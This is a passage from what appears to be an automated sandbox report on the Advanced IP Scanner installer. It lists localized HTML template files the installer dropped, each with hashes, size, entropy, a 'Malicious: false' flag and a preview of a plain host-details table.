SSDEEP:	24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
MD5:	7B64191A23A7F9EF19022435267FED84
SHA1:	3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
SHA-256:	58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
SHA-512:	F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ko_kr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1162
Entropy (8bit):	5.054590965912235
Encrypted:	false
SSDEEP:	12:AMJnuKoh2Oe2B2uT2B6b2MKb2tFb2HcS2RF2TQ2n0Kt1RhRGDbYUzYKeIzAkReEs:lFoMOhsuSrXquHuSr0Kt5RGDBPReEhyv
MD5:	AAFE73E9DD742ECBA22903D3DA498688
SHA1:	AE8580EFD2267042ABB5D6EBC36A0277345BE963
SHA-256:	777877C97D0D8753B28A02666B19729B8E2046A387895CD675EF2E5EEBAE1C7A
SHA-512:	06C7B541638FA292E0438EDBD71733F35988C95A99F10B873299D55D92C66347B974969E31EFEC51B6D9F64859434243BF4252642651DC61E18F067C2A2784E4
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.. ..:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>...</center></b></td><td><b><center>.. .

C:\Program Files (x86)\Advanced IP Scanner\details_panel_lt_lt.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1169
Entropy (8bit):	4.842737243338588
Encrypted:	false
SSDEEP:	24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
MD5:	59A017F97EA0743C741E972819CFEA19
SHA1:	E6480E68B930A8595EACBAC255B3BFAFCC30D466
SHA-256:	71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
SHA-512:	95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami

C:\Program Files (x86)\Advanced IP Scanner\details_panel_lv_lv.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1179
Entropy (8bit):	4.8880159035742965
Encrypted:	false
SSDEEP:	24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
MD5:	1588431C36A3112355553A6967E3405E
SHA1:	0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
SHA-256:	69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
SHA-512:	F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De

C:\Program Files (x86)\Advanced IP Scanner\details_panel_nb_no.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.789609676615686
Encrypted:	false
SSDEEP:	24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
MD5:	C81043ED485CCE96CDA08A5986F04E31
SHA1:	8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
SHA-256:	119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
SHA-512:	56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

C:\Program Files (x86)\Advanced IP Scanner\details_panel_nl_nl.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.79937338549848
Encrypted:	false
SSDEEP:	24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
MD5:	A420CCFD66627A25731173A49B1C98E1
SHA1:	CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
SHA-256:	FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
SHA-512:	99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c

C:\Program Files (x86)\Advanced IP Scanner\details_panel_pl_pl.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.85707182260681
Encrypted:	false
SSDEEP:	12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
MD5:	1AD783BD4AF434D47BD69AB818A91DFA
SHA1:	8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
SHA-256:	2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
SHA-512:	1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_pt_br.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1158
Entropy (8bit):	4.820254321830803
Encrypted:	false
SSDEEP:	24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
MD5:	82043E0E5311A889AD7709A4A735BC76
SHA1:	F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
SHA-256:	9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
SHA-512:	E14FC86BF8DFD07536A357A760CDD2858B3536DF69D7FDA7BE06429E9969116C864D3B6036E1E05EA637621DA69F9BBD6776276C1D520F7140DB2646BB9896C0
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operacional:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usu.rio:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Coment.rios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servi.o</center></b></td><td><b><center>Detalhe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ro_ro.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.803303336966706
Encrypted:	false
SSDEEP:	24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
MD5:	27C167C1E5624DC7F4D0256ABAA8632F
SHA1:	7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
SHA-256:	E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
SHA-512:	C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ru_ru.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.137449444677303
Encrypted:	false
SSDEEP:	24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
MD5:	C09C9A49D20E9E03FBA82E0247B38770
SHA1:	B95253268F788CEB0B603E194C4AB1A7451B2C44
SHA-256:	717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
SHA-512:	BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>......:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............ .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sk_sk.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	4.88658440484172
Encrypted:	false
SSDEEP:	24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
MD5:	E133CA274E9A1C5B55A9AE459656E935
SHA1:	B115F78BD0BA440A10A2ED5093712D7675F3E45C
SHA-256:	D80655A9F288A1207F193025486A876F3B0BF30584F361FF04E8ECEBCB444DA0
SHA-512:	CD4B9AEECE96654B462CF2887C3A6809FA083772016D078172D19C64332D072FE3A1E1F46EF7B1017F3FDAF9F7B0BDC131682BCA50645909FA5BDB807D66B2FB
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robca:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pou..vate.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.re:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnos

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sl_si.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.820312505780483
Encrypted:	false
SSDEEP:	24:lFoJgsuSAXqSH+l70Kt5RGDSRBIReEhyv:HogsRAXqSH+l70U2Di0s
MD5:	D085FB64BFB3757DB202DE6552075927
SHA1:	6D7D1701D2C4A9E4AF18217DD9169E19E1D03F3A
SHA-256:	411862A29DF284FA2D4B2E33FB9839DD030A99EBC5823212E9CDB2FFCFB3EE26
SHA-512:	5BEA33C25F3A28D1138834F6E6D8C2D9BAEAFEE39833980C1EC022ED8EEAE75453747CF844C31232F9F46D77C427F388CF65B070F03ED5C81B166D85BBD41379
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stanje:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacijski sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvajalec:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Uporabnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarji:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Storitev</center></b></td><td><b><center>Podro

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sr_latn_rs.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1152
Entropy (8bit):	4.835031850395569
Encrypted:	false
SSDEEP:	24:lFouJsuSMBXqHHZlL0Kt5RGDV9iReEhyv:HnJsRAXqHHZlL0U2DV9os
MD5:	8723B14E9398038715746AD9E3BDE732
SHA1:	E90F353839A5C6A2AC6DB8D1860D73077CCD6260
SHA-256:	201854FBE199471A6756CAC6649F716653304D03C10E22BB1DD6D3D04BF6E5F9
SHA-512:	F5C813713BEBE817B8C6DCDAB00B6314C667C986589943AA4EC173C924281379387CB92241E265BD3EDFE12D9F0EFA6036DF9C832E7F70D04F9ED88B72478E4C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Detalji</cen

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sv_se.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.808850143987916
Encrypted:	false
SSDEEP:	24:lFouisuSPXqBQqHJl4/0Kt5RGDz9cReEhyv:HnisRPXqWqHJlK0U2Dz9+s
MD5:	3A9608446029B501A8C31084CA170B0E
SHA1:	E6643513E77B23997112741963B24C60EB4DF08C
SHA-256:	2C9A4462B5BCBDBFE9D7C8E167ECA3CC8DF7DD2440BA0BBE2ACA3E21BA1C4AF6
SHA-512:	58A3A091E8C03C6A83C17EF7FDE3A138EFC609FA9928801ACF75EAF7D19DED809B142940598558049AA12E9DB9F4D2C4D057FB10198D8ABCDCE2876FE983B990
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tillverkare:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anv.ndare:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Detaljer</c

C:\Program Files (x86)\Advanced IP Scanner\details_panel_th_th.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1292
Entropy (8bit):	5.135718210930255
Encrypted:	false
SSDEEP:	24:lFo+ag1FGfysuSIIrXqF/w9HUkb830Kt5RGDLeMFG/zReEhyv:Hra4FGfysRxXqMHUkC0U2DqMFG/xs
MD5:	37065F0D6A5CE8F22D831F76A7644D8B
SHA1:	2750F55AC41F0888159604AFBCF70C6B894C01BD
SHA-256:	18B7C895BABB71508CC7F2A5861C493A8FB13D12D2CBD7A2C0441DDDA5C545C2
SHA-512:	8CA493719F739CA680BA666E0C55D4D471C207F1D8E7EC12DB2E93692A1123B94EB07B75311B667E5B31300C90C6009745AFE7F4067D237570091B3BD1ECB45E
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>......:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellsp

C:\Program Files (x86)\Advanced IP Scanner\details_panel_tr_tr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.8635515480686085
Encrypted:	false
SSDEEP:	24:lFozSsuSxXqXH0k9/Ue/0Kt5RGD4ReEhyv:HESsRxXqXHBUM0U2DSs
MD5:	E63975AFFC0CFD1416D93982E6E0C0E8
SHA1:	28F0F8996D128E8095BE958B32F245F1EBB90D60
SHA-256:	6B385410B01F24D20294E1B92E7D391F20D146A0AAB937809483C8ED624017CA
